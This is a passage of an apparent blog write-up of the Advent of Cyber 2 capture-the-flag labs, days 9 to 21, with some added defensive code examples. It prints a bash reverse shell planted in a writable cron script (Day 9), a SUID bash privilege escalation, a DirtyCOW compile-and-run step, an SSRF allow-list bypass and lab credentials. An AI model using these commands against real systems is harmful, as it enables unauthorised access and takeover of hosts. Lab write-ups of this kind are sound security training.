| drwxr-xr-x    2 0        0            4096 Nov 16 15:04 human_resources
|_drwxrwxrwx    2 65534    65534        4096 Nov 16 19:35 public [NSE: writeable]
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.4.16.248
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f6:ce:52:11:22:9e:b1:c0:ae:45:2a:f9:2f:70:eb:cb (RSA)
|   256 4b:77:b2:d4:76:53:8c:ec:cb:be:3a:69:51:ff:3c:8f (ECDSA)
|_  256 53:3f:2f:ca:c2:d6:ce:ec:99:30:f7:1f:ce:a5:d7:f5 (ED25519)
Service Info: Host: Welcome; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
Since port 21 was open, I attempted to login to the FTP server as an anonymous user. As uncovered from the NMAP scan, anonymous users had `Read/Write/Execute` permissions in the `public` directory.
```
21/tcp open  ftp     vsftpd 2.0.8 or later
|_drwxrwxrwx    2 65534    65534        4096 Nov 16 19:35 public [NSE: writeable]
```
In the directory, I noticed that there was a file named `backup.sh` and in its contents was a line that went like this:

```
TO-DO: Automate transfer of backups to backup server
```
This gave me the idea of modifying this file to get a reverse shell onto the machine:

```
bash -i >& /dev/tcp/10.4.16.248/666 0>&1
```
I wiped the script clean, added this one line into the file and saved it on the server. I then moved on to opening up a `netcat` listener to catch the incoming traffic on port `666`.
After waiting for about 5 minutes, my theory was confirmed. I got a reverse shell back from the remote server. This meant that `backup.sh` was indeed running every few minutes to back up the server contents.
:)
Before leaving the machine, I grabbed the flag located at `/root/flag.txt`.
[Day 10] Don't be Elfish!
Networking | SMB
The Best Festival Company (TBFC) has since upscaled its IT infrastructure after last year's attack for all the other elves to use, including a VPN server and a few other services. You breathe a sigh of relief..."That's it, Me, Elf McEager saved the Christmas of 2020! I can't wait to---"
But suddenly, a cold shiver runs down your spine, interrupting your monologue...
You suddenly recall that Elf McSkidy had set up a Samba file server just before the attack occurred - could this have been hacked too?! What about our data...Oh no, quick! Find out what usernames may have been leaked and attempt to login to the server yourself, noting down any vulnerabilities found to report back to Elf McSkidy.
Target = 10.10.184.213
As always, I started off the NMAP scan before looking at the challenges and here were my results.
```
Nmap scan report for tar.get (10.10.184.213)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: TBFC-SMB-01)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: TBFC-SMB-01)
Service Info: Host: TBFC-SMB; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 0s, deviation: 1s, median: 0s
| nbstat: NetBIOS name: TBFC-SMB, NetBIOS user: , NetBIOS MAC: (unknown)
| Names:
|   TBFC-SMB Flags:
|   TBFC-SMB Flags:
|   TBFC-SMB Flags:
|   \x01\x02MSBROWSE\x02 Flags:
|   TBFC-SMB-01 Flags:
|   TBFC-SMB-01 Flags:
|   TBFC-SMB-01 Flags:
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: tbfc-smb
|   NetBIOS computer name: TBFC-SMB\x00
|   Domain name: \x00
|   FQDN: tbfc-smb
|_  System time: 2020-12-11T17:48:02+00:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-12-11T17:48:02
|_  start_date: N/A
```
The NMAP scan found some Samba shares on the target machine. Thus, I decided to run `enum4linux` to retrieve the users and shares hosted on the target machine.
```
┌──(nee㉿kali)-[~/boxes/thm/adventofcyber2/day10]
└─$ enum4linux -U tar.get
 ========================
|    Users on tar.get    |
 ========================
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: elfmcskidy      Name:             Desc:
index: 0x2 RID: 0x3ea acb: 0x00000010 Account: elfmceager      Name: elfmceager  Desc:
index: 0x3 RID: 0x3e9 acb: 0x00000010 Account: elfmcelferson   Name:             Desc:

user:[elfmcskidy] rid:[0x3e8]
user:[elfmceager] rid:[0x3ea]
user:[elfmcelferson] rid:[0x3e9]
```
```
┌──(nee㉿kali)-[~/boxes/thm/adventofcyber2/day10]
└─$ enum4linux -S tar.get
 ====================================
|    Share Enumeration on tar.get    |
 ====================================
        Sharename       Type      Comment
        tbfc-hr         Disk      tbfc-hr
        tbfc-it         Disk      tbfc-it
        tbfc-santa      Disk      tbfc-santa
        IPC$            IPC       IPC Service (tbfc-smb server (Samba, Ubuntu))
```
Now that I had the list of users and shares on the target, I tried to access the shares with the help of `smbclient` and the following command:
```
┌──(nee㉿kali)-[~/boxes/thm/adventofcyber2/day10]
└─$ smbclient //tar.get/tbfc-santa -U
```
However, accessing it with all 3 usernames returned an `NT_STATUS_LOGON_FAILURE` error. Thus, I decided to login to the share `tbfc-santa` without a user parameter.
And we were in the share.
Challenge
What directory did ElfMcSkidy leave for Santa?
I opened the file `note_from_mcskidy.txt` to look at the contents and this was what I found.
Challenge solved!
[Day 11] The Rogue Gnome
Networking | Privilege Escalation | Linux
This is it - the moment that Elf McEager has been waiting for. It's the final exam of the Nmap course that he enlisted on during "Day 8 - What's Under the Christmas Tree?". It looks like all that hard work of hitting the books has paid off..."Success!" Elf McEager screams..."the exploit worked! Yippeee!"
Elf McEager has successfully managed to create a reverse shell from the target back to his computer. Little did he know, the real exam begins now...The last stage of the exam requires Elf McEager to escalate his privileges! He spent so much time studying Nmap cheatsheets that he's now drawing a blank...Can you help Elf McEager?
To be the good guy, sometimes you gotta be the bad guy first...
Target = 10.10.68.216
SSH credentials: `cmnatic` / `aoc220`

```
ssh cmnatic@10.10.68.216
```
I'm greeted with an account with limited privilege on login. The first thing I did was to host a simple python web server and throw my `linpeas.sh` over to the target machine.
Followed by that, I made the script executable and let it run to assist with the privilege escalation. This script goes around the system environment and gathers the weakest links that could possibly be exploited.
After the script had run, it returned a bunch of results. I narrowed it down to this `SUID` section which is usually known to have weak configurations that allow privilege escalation.
Here I noticed that `/bin/bash` had SUID set. I googled around for an exploit and found this!
```
sudo sh -c 'cp $(which bash) .; chmod +s ./bash'
./bash -p
```
Lastly, I took the flag located at `/root/flag.txt` and dipped for the day!
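Day 9 (a world-writable `backup.sh` executed on a schedule) and Day 11 (a SUID bit on `/bin/bash`) are both filesystem-permission findings that a periodic audit catches before an attacker does. As an added example covering both days (not code from the challenges or the author), here is an audit that parses `ls -l`-style permission strings once and applies two checks: SUID binaries that are not on an agreed baseline, and scripts named in the system crontab that group or world can write. The listing, the crontab and the baseline are constructed assumptions.

```python
# Constructed `ls -l`-style listing and system crontab; neither comes from the challenge boxes.
LISTING = """\
-rwsr-xr-x 1 root root 1113504 Jun  6  2019 /bin/bash
-rwsr-xr-x 1 root root   44664 Mar 22  2019 /usr/bin/passwd
-rwsr-xr-x 1 root root  149080 Jan 31  2020 /usr/bin/sudo
-rwxrwxrwx 1 ftp  ftp      172 Nov 16 19:35 /var/ftp/public/backup.sh
-rwxr-xr-x 1 root root     410 Nov 16 15:04 /usr/local/bin/rotate-logs.sh
"""

CRONTAB = """\
# m h dom mon dow user command
*/5 * * * * root bash /var/ftp/public/backup.sh
0 3 * * * root /usr/local/bin/rotate-logs.sh
"""

# Assumption: a site-specific baseline of SUID binaries that are expected to exist.
SUID_BASELINE = {"/usr/bin/passwd", "/usr/bin/sudo"}


def parse_listing(text: str):
    """Turn `ls -l` lines into {mode, owner, path}; the path is the 9th whitespace-separated field."""
    entries = []
    for line in text.splitlines():
        fields = line.split(None, 8)   # mode, links, owner, group, size, month, day, time, path
        if len(fields) == 9:
            entries.append({"mode": fields[0], "owner": fields[2], "path": fields[8]})
    return entries


def is_suid(mode: str) -> bool:
    return mode[3] in "sS"              # the owner-execute slot shows 's' when SUID is set


def is_group_or_world_writable(mode: str) -> bool:
    return mode[5] == "w" or mode[8] == "w"


def cron_scripts(crontab: str):
    """Absolute paths in the command part of system crontab lines (five time fields, then the user)."""
    for line in crontab.splitlines():
        fields = line.split()
        if line.startswith("#") or len(fields) < 7:
            continue
        for token in fields[6:]:
            if token.startswith("/"):
                yield token


def audit(listing=LISTING, crontab=CRONTAB, suid_baseline=SUID_BASELINE):
    """Return (finding, path) tuples for SUID files off the baseline and writable cron-run scripts."""
    by_path = {e["path"]: e for e in parse_listing(listing)}
    findings = []
    for e in by_path.values():
        if is_suid(e["mode"]) and e["path"] not in suid_baseline:
            findings.append(("suid-not-in-baseline", e["path"]))
    for script in cron_scripts(crontab):
        e = by_path.get(script)
        if e and is_group_or_world_writable(e["mode"]):
            findings.append(("writable-cron-script", script))
    return findings


if __name__ == "__main__":
    for finding, path in audit():
        print(f"{finding}: {path}")
```

On a live host the listing comes from `find / -perm -4000 -type f -exec ls -l {} +` for the SUID check and from `ls -l` over the paths referenced in `/etc/crontab` and `/etc/cron.d` for the second; anything the audit flags that is not a deliberate decision is the misconfiguration the two days exploited.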
[Day 12] Ready, set, elf.
Networking | Public Exploits
Christmas is fast approaching, yet, all remain silent at The Best Festival Company (TBFC). What gives?! The cheek of those elves - slacking at the festive period! Santa has no time for slackers in his workshop. After all, the sleigh won't fill itself, nor will the good and naughty lists be sorted. Santa has tasked you, Elf McEager, with whacking those elves back in line.
Target = 10.10.115.154
As always, I started off with an NMAP scan to recon the machine.
┌──(nee㉿kali)-[~/boxes/thm/adventofcyber2/day12] └─$ nmap -Pn -sC -sV -A -oN initial.nmap 10.10.115.154 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( nmap.org ) at 2020-12-13 12:23 EST Nmap scan report for 10.10.115.154 Host is up (0.35s latency). Not shown: 996 filtered ports PORT STATE SERVICE VERSION 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: TBFC-WEB-01 | NetBIOS_Domain_Name: TBFC-WEB-01 | NetBIOS_Computer_Name: TBFC-WEB-01 | DNS_Domain_Name: tbfc-web-01 | DNS_Computer_Name: tbfc-web-01 | ProductVersion: 10.0.17763 | System_Time: 2020-12-13T17:23:49+00:00 | ssl-cert: Subject: commonName=tbfc-web-01 | Not valid before: 2020-12-11T21:55:21 |_Not valid after: 2021-06-12T21:55:21 |_ssl-date: 2020-12-13T17:23:55+00:00; +1s from scanner time. 5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |http-title: Service Unavailable 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) | ajp-methods: | Supported methods: GET HEAD POST OPTIONS 8080/tcp open http Apache Tomcat 9.0.17 |_http-favicon: Apache Tomcat |_http-title: Apache Tomcat/9.0.17 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
I realized that port 8080 was open on the machine and tried to access it.
I was greeted with an Apache Tomcat page. I was also told that the version in use was `9.0.17`. I then started hunting for vulnerabilities relating to this version of Apache Tomcat. Eventually, I found this exploit over at exploit-db. The best part about this exploit was that it had a Metasploit module.
Now I just had to set the appropriate params and break into the box.
Now that I had access to the machine, I just had to type flag 1 and get out :)
And that was the end of day 12!
[Day 13] Coal for Christmas
Special by John Hammond | Privilege Escalation | DirtyCow
Target = 10.10.185.205
As always, I started off with an NMAP scan to recon the machine.
```
┌──(nee㉿kali)-[~/boxes/thm/adventofcyber2/day13]
└─$ nmap -sC -sV -A 10.10.185.205
Nmap scan report for 10.10.185.205
Host is up (0.35s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA)
23/tcp  open  telnet  Linux telnetd
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap done: 1 IP address (1 host up) scanned in 36.96 seconds
```
I realized that port 23, aka insecure `TELNET`, was open on the machine. Thus, I tried to access the machine via that port and got this back.
```
┌──(nee㉿kali)-[~/boxes/thm/adventofcyber2/day13]
└─$ telnet 10.10.185.205
Username: santa
Password: clauschristmas
```
Since port 22, aka `Secure Shell`, was open on the machine, I tried accessing it with the same credentials.
```
┌──(nee㉿kali)-[~/boxes/thm/adventofcyber2/day13]
└─$ ssh santa@10.10.185.205
```
Those credentials worked for `SSH` too!
Upon further inspection of the directory, I realized that one of the files in there contained snippets of an exploit named `DirtyCOW`. I then proceeded to check if the kernel running on the target machine was vulnerable to that exploit.
It was. So I moved on to google search a snippet of the C code placed on the machine and ended up with this full exploit. I put the exploit on the target machine and proceeded to compile it.
```
$ gcc -pthread dirty.c -o dirty -lcrypt
```
Now all there was left to do was, run the exploit and proffffffitttt???
```
./dirty
```
Now that the exploit has successfully completed, I proceeded to login via SSH to verify that I indeed had root permissions.
```
┌──(nee㉿kali)-[~/boxes/thm/adventofcyber2/day13]
└─$ ssh nee@10.10.185.205
```
Challenge
Uh oh, looks like that perpetrator left a message! Follow his instructions to prove you really did leave Coal for Christmas!
After you leave behind the coal, you can run `tree | md5sum`
What is the MD5 hash output?
```
nee@christmas:~# touch coal
nee@christmas:~# tree | md5sum
```
That was a great challenge by John Hammond!
[Day 14] Where's Rudolph?
Special by TheCyberMentor | OSINT
'Twas the night before Christmas and Rudolph is lost
Now Santa must find him, no matter the cost
You have been hired to bring Rudolph back
How are your OSINT skills? Follow Rudolph's tracks...
While hunting and searching for any hints or clues
Santa uncovers some details and shares the news
Rudolph loved to use Reddit and browsed aplenty
His username was IGuidetheClaus2020
With the provided username, I went straight to google and discovered the reddit profile.
Challenge 1
What URL will take me directly to Rudolph's Reddit comment history?
This challenge was solved via the google query.
Challenge 2
On what other social media platform might Rudolph have an account?
Going off one of Rudolph's comments, I was able to infer that he had an account on twitter.
I was also able to find Rudolph's twitter account via another google query.
Challenge 3
Based on Rudolph's post history, he took part in a parade. Where did the parade take place?
Going through Rudolph's twitter, I found a couple of images related to a parade. I threw one into Google's reverse image search and found the information for this challenge.
Challenge 4
Did you find a flag too?
Rudolph had posted a "high resolution" photo on twitter over here. I threw that photo into exiftool and uncovered the flag.
```
┌──(nee㉿kali)-[~/boxes/thm/adventofcyber2/day14]
└─$ exiftool lights-festival-website.jpg | strings | grep FLAG
```
Great start to OSINT challenges! Big up The Cyber Mentor!
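The `exiftool | strings | grep` pipeline above works because a JPEG carries its metadata in length-prefixed segments ahead of the image data, and any text in them is readable as-is. As an added example (not code from the challenge or the author), here is a walker that reads those segments directly, pulls out printable runs the way `strings` does, and searches them, which is the check to run on a photo before publishing it. The JPEG is a constructed skeleton with an Exif and a comment segment and no image data; the strings inside it are placeholders.

```python
import re
import struct

PRINTABLE = re.compile(rb"[ -~]{4,}")   # the `strings` heuristic: runs of 4+ printable ASCII bytes


def _segment(marker: int, payload: bytes) -> bytes:
    # A JPEG segment: 0xFF, marker byte, 2-byte big-endian length that counts itself, payload.
    return b"\xff" + bytes([marker]) + struct.pack(">H", len(payload) + 2) + payload


def build_sample_jpeg() -> bytes:
    """Constructed JPEG skeleton (SOI, APP1/Exif, COM, EOI) with no image data; not Rudolph's photo."""
    exif = b"Exif\x00\x00" + b"Artist: Rudolph (constructed)"
    comment = b"FLAG{constructed-placeholder}"
    return b"\xff\xd8" + _segment(0xE1, exif) + _segment(0xFE, comment) + b"\xff\xd9"


def iter_segments(data: bytes):
    """Yield (marker, payload) for each metadata segment that precedes the entropy-coded image data."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker in (0xD9, 0xDA):        # EOI, or SOS: scan data follows and has no length field
            break
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        yield marker, data[pos + 4:pos + 2 + length]
        pos += 2 + length


def metadata_strings(data: bytes):
    """Every printable run in the metadata segments, tagged with the marker it came from."""
    found = []
    for marker, payload in iter_segments(data):
        found.extend((marker, s.decode("ascii")) for s in PRINTABLE.findall(payload))
    return found


def search_metadata(data: bytes, needle: str):
    """The `strings | grep` step: strings containing the needle."""
    return [s for _, s in metadata_strings(data) if needle in s]


if __name__ == "__main__":
    sample = build_sample_jpeg()
    for marker, text in metadata_strings(sample):
        print(f"segment 0x{marker:02X}: {text}")
    print("matches:", search_metadata(sample, "FLAG"))
```

Real Exif blocks are TIFF structures with their own tag directory, so a full parser (or exiftool itself) is needed to know which tag a string belongs to, but for the question "does this image leak text I did not mean to publish" the raw string scan is enough, and stripping the APP1 and COM segments before upload is the fix.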
[Day 15] There's a Python in my stocking!
Scripting | Python
Simple introduction to python.
```python
x = [1, 2, 3]
y = x
y.append(6)
print(x)
```
Challenge
What is the output of the program provided in today's material?
The solution to that would actually be `[1, 2, 3, 6]`. This is due to the "Pass by reference" rule.
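The Day 15 program prints `[1, 2, 3, 6]` because `y = x` binds a second name to the same list object rather than copying it. As an added example (not code from the challenge or the author), here is the same program next to the cases a practitioner trips over: a shallow copy, a nested list where the shallow copy still shares the inner lists, and the identical effect across a function call, where the parameter is just another name for the caller's list.

```python
import copy


def alias_demo():
    """The program from today's material: y is a second name for the same list object."""
    x = [1, 2, 3]
    y = x
    y.append(6)
    return x, y is x            # ([1, 2, 3, 6], True)


def copy_demo():
    """A shallow copy gives y its own list, so appending to y leaves x untouched."""
    x = [1, 2, 3]
    y = x.copy()                # equivalently list(x) or x[:]
    y.append(6)
    return x, y                 # ([1, 2, 3], [1, 2, 3, 6])


def nested_demo():
    """Shallow copies still share the inner lists; deepcopy duplicates the whole structure."""
    x = [[1], [2]]
    shallow = x.copy()
    deep = copy.deepcopy(x)
    shallow[0].append(9)        # visible through x as well: same inner object
    deep[1].append(8)           # not visible through x: a separate inner object
    return x, shallow, deep     # ([[1, 9], [2]], [[1, 9], [2]], [[1], [2, 8]])


def append_six(items):
    """Across a call the parameter is another name for the caller's list, so the caller sees the change."""
    items.append(6)
    return items


def call_demo():
    x = [1, 2, 3]
    returned = append_six(x)
    return x, returned is x     # ([1, 2, 3, 6], True)


if __name__ == "__main__":
    print(alias_demo(), copy_demo(), nested_demo(), call_demo(), sep="\n")
```

The security-relevant habit this builds is to never hand a mutable object (a config dict, a list of allowed hosts) to code you do not control without copying it first, because that code can change it for every other holder of the same reference.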
[Day 16] Help! Where is Santa?
Scripting | Requests
Oh no! Santa 🎅 has taken off, leaving you -- the faithful elves behind! Can you help find Santa's location?
CLUE: Santa's Sled has an API we can talk to. The key for the API is between 0 and 100, and it's an odd number. But be careful! After an unknown number of attempts, Santa's Sled will ban your IP address.
Target = 10.10.1.51
As always, I started off with an NMAP scan to recon the machine. This was to discover which port the web API was hidden on.
```
┌──(nee㉿kali)-[~/boxes/thm/adventofcyber2/day16]
└─$ nmap -sV -sC -A 10.10.1.51
Starting Nmap 7.91 ( nmap.org ) at 2020-12-16 11:40 EST
Nmap scan report for 10.10.1.51
Host is up (0.39s latency).
Not shown: 999 closed ports
PORT     STATE SERVICE  VERSION
8000/tcp open  http-alt uvicorn
|   HTTPOptions: 
|     HTTP/1.1 405 Method Not Allowed
|     date: Wed, 16 Dec 2020 16:41:00 GMT
|     server: uvicorn
|     content-length: 31
|     content-type: application/json
|     Connection: close
|_    {"detail":"Method Not Allowed"}
|_http-server-header: uvicorn
|_http-title: Santa's Tracker
```
From the NMAP scan, I found out that the webserver was hidden and running on port 8000.
I was provided with a page filled with hyperlinks when I tried to access the webpage.
Upon inspecting the source, I found the absolute path of the API and its usage.
http://10.10.1.51:8000/api/{API_KEY}
Based on the clue, the API key was an odd number between 0 and 100. Thus, I made a simple bash script to iterate through all values between 0 and 100. Here's the script I wrote.
#!/bin/bash
# Query the API once for every candidate key from 1 to 100 and print each response on its own line
x=1
while [ "$x" -le 100 ]
do
  curl 10.10.72.198:8000/api/$x
  printf "\n"
  x=$(( x + 1 ))
done
After running the script, I uncovered the correct API key value together with where Santa actually was. Another challenge in the bag!
[Day 17] ReverseELFneering
Reverse Engineering | GDB | Linux
McSkidy has never really touched low-level languages - this is something they must learn in their quest to defeat the Christmas monster.
Before jumping into the challenge, here are a few things I learnt about assembly along the way!
The first thing I learnt was a tool called Radare2. radare2 is a framework for reverse engineering and analysing binaries. It can be used to disassemble binaries (translate machine code to assembly, which is actually readable) and debug said binaries (by allowing a user to step through the execution and view the state of the program).
Here's a file named file1 and here's the output when it's successfully executed.
The program adds up the values of a and b. It then displays the result as c.
To see what was happening under the hood, I ran the tool mentioned above on the file with the -d flag, which specifies debug mode.
Next, to ask the program to analyze the binary I simply responded with aa. When using aa the program might take 5-10 minutes to return results depending on your system. It analyses all symbols and entry points in the executable. The analysis, in this case, involves extracting function names, flow control information, and much more!
Once the analysis is complete, to list the functions found in the program, I entered afl. This stands for analyze function list.
During analysis I realized that there was a function at main. Thus, I used the command pdf @main to disassemble it. pdf stands for Print Disassembly Function.
From this, I was able to see that the instructions declare 3 integer variables at the start of the program. Changes to those variables happen at the 7th instruction. Thus I set a breakpoint at the memory offset 0x00400b55, using the db command:
db 0x00400b55
I ran the pdf @main command again to verify that the breakpoint was indeed set at the location that I wanted it to be at. Now that I had set a breakpoint, I ran the program using the command dc.
Running both dc and pdf @main tells me that my breakpoint was successfully hit. From this, I could tell that the program was moving the value 4 (double word) into the variable var_ch. The same thing happens with the value 5 and the variable var_8h.
Next up, I wanted to view the contents of the local_ch variable. For this I needed to run a command together with the memory address of that particular variable. I uncovered the memory address using the command pdf @main.
To view the contents, I used the command px @ rbp-0xc.
Upon inspection of the memory location dump, I realized that 4 was nowhere to be found. After some time, I realized that my breakpoint was set at that instruction, so the instruction hadn't actually run yet. To advance further, I used the command ds.
dc = continues execution until a breakpoint is hit
ds = steps to the next instruction
Now I was able to see the value 04 in hex!
Skipping a few instructions ahead, I saw an add instruction which adds eax and edx and stores the result in eax.
Now running the dr command displayed the register values to prove that the instructions were interpreted correctly.
The next few set of instructions involve moving the registers back into the variables so that they can be referenced when the program prints the results.
Lastly, the instructions call a printf function before closing the program, to print out the result onto the terminal.
Now that's enough of that! Onto the challenge :0 (this challenge is based on another file that was provided)
Challenge 1
What is the value of local_ch when its corresponding movl instruction is called (first if multiple)?
I first started by running radare2 on the file with the debug flag and let it analyze the program with the command aa.
Next, I used the pdf command on the main function to print the disassembly of that function. That gave me what was needed for the first challenge.
Challenge 2
What is the value of eax when the imull instruction is called?
For this, I first went ahead and set a breakpoint at the memory address 0x00400b62 using the command db 0x00400b62. I then ran the dc command so that the program would continue all the way until it hit the breakpoint.
Since the dword variable var_8h was being moved into eax, I dumped the memory location using the variable's address. That gave the answer to this challenge.
Challenge 3
What is the value of local_4h before eax is set to 0?
To solve this, I had to progress a couple of steps ahead from my current breakpoint. I used the ds command to step to the next instruction.
And with that, I'm done for this day. Reversing was one of my weakest spots. This challenge was really insightful and pushed me out of my comfort zone to learn a new reversing tool. Awesome challenge!
[Day 18] The Bits of Christmas
Reverse Engineering | GDB | Linux
"Silly Santa...Forgetting his password yet again!" complains Elf McEager. However, it is in fact Elf McEager who is silly for not creating a way to reset Santa's password for the TBFC dashboard.
Santa needs to get back into the dashboard for Christmas! Can you help Elf McEager reverse engineer TBFC's application to retrieve the password for Santa?!
RDP Creds
Username: cmnatic Password: Adventofcyber!
I was given an application that I was supposed to get around using reverse engineering. For this scenario, I could've either used ILSpy or Dotpeek. I went with the first option.
The application basically asks for a password and returns the following response if the entered string doesn't match.
Opening the target application with ILSpy revealed the components the application was made of.
Upon inspection I noticed that there's a class named crack me. Thus, I decided to take a closer look at it.
Looking at the InitializeComponent() function, I was able to see how the application was made and what takes place when the application is loaded on the user's screen.
From the InitializeComponent() function, I was able to tell that a function named buttonActivate_Click() was called when a user submits the password. So I started looking at the buttonActivate_Click() function.
In the function, I was able to uncover both the password to the application and the flag! With that, day 18's challenge is over!
[Day 19] The Naughty or Nice List
Special by Tib3rius | Web | SSRF
Santa has released a web app that lets the children of the world check whether they are currently on the naughty or nice list. Unfortunately, the elf who coded it exposed more things than she thought. Can you access the list administration and ensure that every child gets a present from Santa this year?
Target = 10.10.33.21
I was greeted with this webpage when accessing the machine via port 80. When a search is made, I realized that it's processed through a proxy parameter in the URL as shown below.
URL Encoded= 10.10.33.21/?proxy=http%3A%2F%2Flist.hohoho..
URL Decoded= 10.10.33.21/?proxy=http://list.hohoho:8080/..
While taking a closer look, I realized that .hohoho isn't a valid TLD on the internet. This led me to believe that it might be referencing a machine in the internal network.
So I tried to request the root of that particular internal web server using the following proxy parameter.
URL Encoded= 10.10.33.21/?proxy=http%3A%2F%2Flist.hohoho..
URL Decoded= 10.10.33.21/?proxy=http://list.hohoho:8080
The result returned a generic 404 error. However, this confirms that I was able to make the server request this modified URL provided by me.
Next, I tried to make the server request another site. In this case, this particular site you are reading this on.
URL Encoded= 10.10.33.21/?proxy=http%3A%2F%2Fneeranjan%2..
URL Decoded= 10.10.33.21/?proxy=http://neeranjan.com
This was the response I got. The internal firewall had blocked me from accessing items outside of their network.
I was hit with the same error message when I tried to access localhost. Thus, I concluded that they were only allowing access to domains starting with list.hohoho. To bypass this, I could use DNS subdomains and create my own subdomain starting with list.hohoho and point it to 127.0.0.1, which resolves to localhost.
However, I would have to buy/reuse one of my domains and go through the hassle of setting up DNS records. Thus, I went with localtest.me! Check them out! localhost testing done right :)
Now that I had my payload theory ready, it was time to execute it. I encoded the URL as shown below.
URL Encoded= 10.10.33.21/?proxy=http%3A%2F%2Flist.hohoho..
URL Decoded= 10.10.33.21/?proxy=http://list.hohoho.local..
And there it was! The password to the admin page.
Upon deletion of the naughty list, I was awarded the flag!
This was definitely one of the more interesting web challenges. Managed to learn a thing or two thanks to Tib3rius.
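The bypass works because the proxy only checks that the destination starts with list.hohoho. As an added example (my own code, not the challenge's), here is that prefix check next to a stricter one that compares the parsed host name exactly and checks where it resolves; the DNS table is constructed so the example runs offline, and the original filter being a plain prefix match is an assumption drawn from the behaviour above.

```python
from ipaddress import ip_address
from urllib.parse import urlsplit

# The one internal service the ?proxy= parameter is meant to reach.
ALLOWED_HOSTS = {"list.hohoho"}
ALLOWED_PORTS = {8080}

# Constructed stand-in for DNS so the example runs offline; a real check would
# call socket.getaddrinfo(). Addresses are made up except for loopback.
FAKE_DNS = {
    "list.hohoho": "10.0.0.5",                # the internal list server (constructed)
    "list.hohoho.localtest.me": "127.0.0.1",  # wildcard service pointing at loopback
    "neeranjan.com": "203.0.113.10",          # documentation range, constructed
}


def weak_check(url: str) -> bool:
    """Assumed filter on the box: a plain prefix match. Anything that merely
    begins with the allowed name, such as list.hohoho.localtest.me, passes."""
    return url.startswith("http://list.hohoho")


def strict_check(url: str) -> bool:
    """Parse the URL, compare the host name exactly, then verify where it resolves."""
    parts = urlsplit(url)
    if parts.scheme != "http":
        return False
    host = parts.hostname              # user@host tricks and ports are split off here
    if host not in ALLOWED_HOSTS:      # exact match, not "starts with"
        return False
    try:
        port = parts.port or 80
    except ValueError:                 # non-numeric port
        return False
    if port not in ALLOWED_PORTS:
        return False
    addr = ip_address(FAKE_DNS.get(host, "0.0.0.0"))
    # Even an allow-listed name must not end up at loopback or an unresolvable address.
    if addr.is_loopback or addr.is_link_local or addr.is_unspecified:
        return False
    return True
```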
[Day 20] PowershELlF to the rescue
Blue Teaming | Powershell
Someone is mischievous at The Best Festival Company. The contents within the stockings have been removed. A clue was left in one of the stockings that hints that the contents have been hidden within Elfstation1. McEager moves quickly and attempts to RDP into the machine. Yikes! He is unable to log in.
Luckily, he has been learning PowerShell, and he can remote into the workstation using PowerShell over SSH.
Task: Use the PowerShell console to navigate throughout the endpoint to find the hidden contents to reveal what was hidden in the stockings.
SSH Creds
Username: mceager Password: r0ckStar!
Target = 10.10.163.212
The first thing I did was to SSH into the given windows box.
Once I was in, I launched PowerShell to complete the challenge.
Challenge 1
Search for the first hidden elf file within the Documents folder. Read the contents of this file. What does Elf 1 want?
So, I moved into the Documents folder. To look for a hidden file, I used the -hidden option together with the command Get-ChildItem.
Now to see the contents, I used the cat command, similar to the Linux environment.
Challenge 2
Search the Windows directory for a hidden folder that contains files for Elf 3. What is the name of the hidden folder?
After much tweaking I ran the Get-ChildItem command with the params -Hidden, -Directory and -Filter "*3*". This meant that I was looking for a hidden directory within the \Windows directory which had the number 3 anywhere in its name. That was all I needed for this challenge.
Challenge 3
How many words does the first file contain?
Thankfully, PowerShell has the cmdlet Measure-Object which could help me out with this. I used the command with the param -Word and solved this challenge.
And that was the end of day 20! Interesting day :) Got to learn a lil bit about PowerShell and how the cmdlets can be used!
[Day 21] Time for some ELForensics
Blue Teaming | Forensics
One of the 'little helpers' logged into his workstation only to realize that the database connector file has been replaced, and he can't find the naughty list anymore. Furthermore, upon executing the database connector file, a taunting message was displayed, hinting that the file was moved to another location. McEager has been notified, and he will put the pieces together to find the database connector file.
Task: Find where the database connector file is hidden using forensic-like investigative techniques.
RDP Creds
Username: littlehelper Password: iLove5now!
Challenge 1
Read the contents of the text file within the Documents folder. What is the file hash for db.exe?
PS C:\Users\littlehelper\Documents> type '.\db file hash.txt'
I used this command to be able to read the file.
Challenge 2
